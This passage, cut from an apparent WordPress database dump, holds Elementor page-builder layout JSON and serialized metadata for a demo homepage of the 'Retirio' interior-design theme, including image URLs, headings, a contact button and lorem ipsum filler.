\\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3398,4792,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3399,4792,'_elementor_pro_version','3.8.1'),(3400,4792,'_elementor_css','a:6:{s:4:\"time\";i:1685014033;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3401,4793,'_wp_page_template','elementor_header_footer'),(3402,4793,'_elementor_edit_mode','builder'),(3403,4793,'_elementor_template_type','wp-page'),(3404,4793,'_elementor_version','3.8.1'),(3405,4793,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"p